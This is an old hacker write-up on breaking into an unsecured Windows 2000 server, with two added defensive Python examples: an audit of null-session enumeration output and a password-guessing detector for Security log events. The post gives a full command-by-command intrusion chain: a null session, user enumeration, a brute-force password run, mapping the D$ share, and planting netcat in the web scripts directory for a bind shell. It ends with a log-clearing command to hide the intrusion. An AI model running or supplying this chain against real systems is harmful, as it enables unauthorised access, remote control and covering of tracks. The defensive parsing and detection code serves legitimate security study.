0wned in 3 easy steps, or, how easy it REALLY is to break into an unsecured NT system

A friend of mine asked me to check the security on his newly installed
windows 2000 server since he was running a website off it. All he
would provide me was the IP address. Of course since I knew he was on
DSL I didn't need to do much recon and was able to focus in on his
system directly.
I figured since this was going to be an 'easy' task, I would eschew
any GUI and do this all from command line utilities (they're more fun
anyway :)) so my first step was to attempt to establish a null session
using the command
net use \\192.168.1.1\IPC$ "" /user:""
Of course, I knew he was a Novell guy and probably hadn't studied NT
security much so it was no surprise to get the response:
The command completed successfully
OK, now that I had a null session to the remote system I used a
program called 'enum' to take a look at the users, shares, and
policies of the system. Using the command
enum -U -M -S -P -G -L -d 192.168.1.1 > enum.txt
which provided me with the following output:
server: 192.168.1.1
setting up session... success.
password policy:
min length: none
min age: none
max age: 42 days
lockout threshold: none
lockout duration: 30 mins
lockout reset: 30 mins
opening lsa policy... success.
server role: 3 [primary (unknown)]
names:
netbios: SERVER
domain: WEB
quota:
paged pool limit: 33554432
non paged pool limit: 1048576
min work set size: 65536
max work set size: 251658240
pagefile limit: 0
time limit: 0
trusted domains:
indeterminate
netlogon done by a PDC server
getting user list (pass 1, index 0)... success, got 3.
Administrator
attributes:
Guest (Built-in account for guest access to the computer/domain)
attributes: disabled no_passwd
nobody (Built-in account for administering the computer/domain)
attributes:
enumerating shares (pass 1)... got 3 shares, 0 left:
fs: C$ ()
fs: D$ ()
fs: E$ ()
ipc: IPC$ (Remote IPC)
getting machine list (pass 1, index 0)... success, got 0.
Group: Administrators
SERVER\nobody
Group: Backup Operators
Group: Guests
SERVER\Guest
Group: Power Users
Group: Replicator
Group: Users
NT AUTHORITY\INTERACTIVE
NT AUTHORITY\Authenticated Users
SERVER\Administrator
cleaning up... success.
As you can see, that's more than enough info to start with. Looking
down the list, it is obvious that the original administrator account
had been renamed to 'nobody' and a fake 'administrator' account had
been set up, most likely with shit permissions.
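Read the report above the way a defender would: it is exactly what any host on the network learns from a null session, and each line the author acts on (no lockout threshold, the built-in description still attached to 'nobody', the Administrators membership) can be checked by a script. The Python below is an added example, not part of the original write-up and not enum's own code; it parses a constructed report in the section-by-section text layout shown above (that layout is assumed from the post's sample) and turns it into findings, naming the RestrictAnonymous value the post refers to.

```python
"""Audit a null-session 'enum' report for the exposures the write-up relies on.
Added example (not the post's code); the sample report is constructed to mirror it."""
import re

SAMPLE_ENUM_OUTPUT = r"""
server: 192.168.1.1
setting up session... success.
password policy:
min length: none
max age: 42 days
lockout threshold: none
getting user list (pass 1, index 0)... success, got 3.
Administrator
attributes:
Guest (Built-in account for guest access to the computer/domain)
attributes: disabled no_passwd
nobody (Built-in account for administering the computer/domain)
attributes:
enumerating shares (pass 1)... got 3 shares, 0 left:
fs: C$ ()
fs: D$ ()
fs: E$ ()
ipc: IPC$ (Remote IPC)
Group: Administrators
SERVER\nobody
Group: Guests
SERVER\Guest
Group: Users
SERVER\Administrator
cleaning up... success.
"""

POLICY_RE = re.compile(r"^(min length|min age|max age|lockout threshold|lockout duration|lockout reset): (.+)$")
USER_RE = re.compile(r"^(\S+)(?: \((.*)\))?$")       # "name" or "name (description)"
SHARE_RE = re.compile(r"^(?:fs|ipc): (\S+) \(.*\)$")
BUILTIN_ADMIN_DESC = "Built-in account for administering the computer/domain"


def parse_enum(text):
    """Walk the report section by section into policy, users, shares and groups."""
    info = {"null_session": False, "policy": {}, "users": {}, "shares": [], "groups": {}}
    section = user = group = None
    for line in (ln.strip() for ln in text.splitlines() if ln.strip()):
        if line == "setting up session... success.":
            info["null_session"] = True            # anonymous IPC$ bind was accepted
        elif line == "password policy:":
            section = "policy"
        elif line.startswith("getting user list"):
            section = "users"
        elif line.startswith("enumerating shares"):
            section = "shares"
        elif line.startswith("Group: "):
            section, group = "groups", line[len("Group: "):]
            info["groups"][group] = []
        elif section == "policy" and POLICY_RE.match(line):
            key, value = POLICY_RE.match(line).groups()
            info["policy"][key] = value
        elif section == "users" and line.startswith("attributes:"):
            info["users"][user]["attributes"] = line[len("attributes:"):].split()
        elif section == "users" and USER_RE.match(line):
            user, desc = USER_RE.match(line).groups()
            info["users"][user] = {"description": desc or "", "attributes": []}
        elif section == "shares" and SHARE_RE.match(line):
            info["shares"].append(SHARE_RE.match(line).group(1))
        elif section == "groups" and "\\" in line:
            info["groups"][group].append(line.split("\\", 1)[1])   # drop the DOMAIN\ part
    return info


def audit(info):
    """Turn the parsed report into (severity, message) findings."""
    findings = []
    if info["null_session"]:
        findings.append(("high", "null session accepted; set RestrictAnonymous under "
                                 r"HKLM\SYSTEM\CurrentControlSet\Control\Lsa"))
    policy = info["policy"]
    if policy.get("lockout threshold") == "none":
        findings.append(("high", "no lockout threshold: password guessing is unlimited"))
    if policy.get("min length") == "none":
        findings.append(("medium", "no minimum password length"))
    for share in info["shares"]:
        if share != "IPC$" and share.endswith("$"):
            findings.append(("medium", "administrative share %s is visible" % share))
    for name, u in info["users"].items():
        if "no_passwd" in u["attributes"] and "disabled" not in u["attributes"]:
            findings.append(("high", "enabled account %s has no password" % name))
    # A renamed built-in administrator shows up two ways: the default
    # description stays attached, and it still sits in Administrators.
    renamed = {n for n, u in info["users"].items()
               if u["description"] == BUILTIN_ADMIN_DESC and n != "Administrator"}
    admins = set(info["groups"].get("Administrators", []))
    if admins and "Administrator" not in admins:
        renamed |= admins
    if renamed:
        findings.append(("info", "built-in administrator appears renamed to %s; renaming "
                                 "does not hide it from enumeration" % ", ".join(sorted(renamed))))
    return findings


if __name__ == "__main__":
    for severity, message in audit(parse_enum(SAMPLE_ENUM_OUTPUT)):
        print("[%s] %s" % (severity, message))
```

Running it against the constructed report yields two high findings (the null session itself and the missing lockout threshold), four medium ones (no minimum length, C$, D$, E$) and the renamed-administrator note; the first high finding is the one the post's RestrictAnonymous fix addresses, the second is what made the half-hour password run possible.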
Needless to say, it was to be the 'nobody' account that I would hit
next with the command:
nat -o output.txt -u nobody.txt -p passlist.txt 192.168.1.1
which revealed the password 'sadie' after about 30 minutes. From
there, it was simple to map a drive with
net use y: \\192.168.1.1\d$ /user:nobody
and then enter the password (sadie) when prompted. From there I was
able to copy netcat into the /scripts directory where I could activate
it at will by typing the command:
http://192.168.1.1/cgi-bin/nc.exe?+-l+-p+5000+-t+-e+cmd.exe
into my browser. From there I only had to drop to a DOS prompt and
type:
TELNET>open 192.168.1.1 5000
To get a command prompt on the remote system.
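The thirty minutes of guessing against 'nobody' only work because the lockout threshold is 'none', but they are far from silent: with logon auditing enabled, every failed network logon is a Windows 2000 Security log event 529 (unknown user name or bad password) and the eventual success a 540 (successful network logon), which is precisely why the ClearEL remark below matters. The Python below is an added example, not the author's tooling; it runs a sliding-window detector over a constructed, simplified pipe-separated record layout (timestamp|event id|user|workstation) that stands in for those events' fields, with a hypothetical workstation name for the source.

```python
"""Spot a password-guessing run in Security log records.
Added example, not code from the original post. Event 529 is the NT/2000
failed-logon record and 540 the successful network logon; the record layout
here (timestamp|event_id|user|workstation) is a constructed simplification."""
from collections import defaultdict, deque
from datetime import datetime, timedelta


def record(ts, event_id, user, workstation):
    return "%s|%s|%s|%s" % (ts.isoformat(), event_id, user, workstation)


def build_sample_log():
    """Constructed records: normal activity, one typo, then a guessing run."""
    base = datetime(2001, 3, 12, 22, 0, 0)
    lines = [record(base - timedelta(minutes=20), 540, "jsmith", "WORKSTATION7"),
             record(base - timedelta(minutes=15), 529, "jsmith", "WORKSTATION7")]
    # forty bad passwords for the renamed administrator, one every three seconds,
    # from a hypothetical source workstation
    lines += [record(base + timedelta(seconds=3 * i), 529, "nobody", "GUESSER-WS")
              for i in range(40)]
    # ...and a successful network logon from the same source shortly after
    lines.append(record(base + timedelta(seconds=125), 540, "nobody", "GUESSER-WS"))
    return lines


def detect_password_guessing(lines, threshold=10, window=timedelta(minutes=5)):
    """Per source workstation, alert once when `threshold` 529s land inside
    `window`, and again if a 540 from that source follows within the window."""
    recent = defaultdict(deque)   # workstation -> (timestamp, user) of recent failures
    alerted_at = {}
    alerts = []
    for line in lines:
        ts_text, event_id, user, ws = line.split("|")
        ts = datetime.fromisoformat(ts_text)
        if event_id == "529":
            failures = recent[ws]
            failures.append((ts, user))
            while ts - failures[0][0] > window:     # expire entries older than the window
                failures.popleft()
            if len(failures) >= threshold and ws not in alerted_at:
                alerted_at[ws] = ts
                targets = sorted({u for _, u in failures})
                alerts.append(("guessing", ws, targets))
        elif event_id == "540" and ws in alerted_at and ts - alerted_at[ws] <= window:
            alerts.append(("success-after-guessing", ws, [user]))
    return alerts


if __name__ == "__main__":
    for kind, source, users in detect_password_guessing(build_sample_log()):
        print("%-24s from %s against %s" % (kind, source, ", ".join(users)))
```

The single mistyped password from WORKSTATION7 never reaches the threshold, the run from the guessing host triggers one alert at its tenth failure, and the success that follows is reported separately as the higher-priority event, since it means a guessed password is now in use. Keying the window on the source workstation rather than the account is deliberate: a tool like the one in the post can spread guesses over several accounts, and per-account counting would miss that.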
Needless to say, after I kicked my friend's ass, I had him set
RestrictAnonymous=1 which stops both the null connection AND enum from
working. However, there are still a LOT of systems out there that
have RestrictAnonymous=0 (which is the default) and are vulnerable.
Of course I didn't bother to clean the logs since I was there with
permission and I wanted him to see the entries, but had I been there
maliciously, I would have uploaded ClearEventLog and run the command
ClearEL all
which would have cleared all 3 event logs and effectively masked my
presence :)
ThePsyko
Public Enemy #7
"God told me to skin you alive"
http://prozac.iscool.net